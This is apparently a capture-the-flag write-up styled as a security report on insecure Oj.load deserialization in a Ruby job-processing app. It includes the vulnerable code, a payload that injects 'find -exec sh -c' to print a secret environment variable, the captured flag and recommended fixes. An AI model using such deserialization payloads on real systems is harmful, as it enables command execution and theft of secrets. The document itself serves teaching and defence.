January 2026

Insecure Ruby Deserialization Leading to RCE

Summary

A vulnerability in the Ruby job processing application allows unauthenticated attackers to execute arbitrary commands. The vulnerability is caused insecure deserialization of user-controlled JSON payloads.

---

Description

The application uses Oj.load() to deserialize JSON payloads from queued jobs without proper validation. The Oj library supports object instantiation through special JSON syntax ("^o"), which allows attackers to instantiate arbitrary Ruby classes with attacker-controlled parameters.

Vulnerable Code

data = Oj.load(job.payload)
RubitMQ.new(data).run()

def run_find()
  puts Open3.capture3("find", *@args)
end

---

Proof of Concept

Malicious Payload

{"^o":"Node","args":["/","-maxdepth","1","-exec","sh","-c","echo $FLAG",";","-quit"]}

Result

This payload extracts the FLAG environment variable

Flag

FLAG{Th4t_J0b_D1d_N07_Go_A5_Exp3ct3d}

---

Impact Assessment

Confidentiality Impact: HIGH

• Full access to environment variables

• Ability to read any file on the system

Integrity Impact: HIGH

• Arbitrary file modification or deletion

• Database manipulation

Availability Impact: HIGH

• System resource exhaustion

• Critical file deletion

• Service disruption or complete system compromise

---

Root Causes

1. Insecure Deserialization

2. Insufficient Input Validation

3. Command Injection

4. Lack of Authentication

5. Principle of Least Privilege Violation

---

Recommendations

• Disable the vulnerable endpoint until patches are deployed

• Replace Oj.load with safe alternatives

• Add authentication and authorization to job submission endpoints

• Type checking and sanitization

• Implement sandboxing for job execution

• Review entire codebase for similar vulnerabilities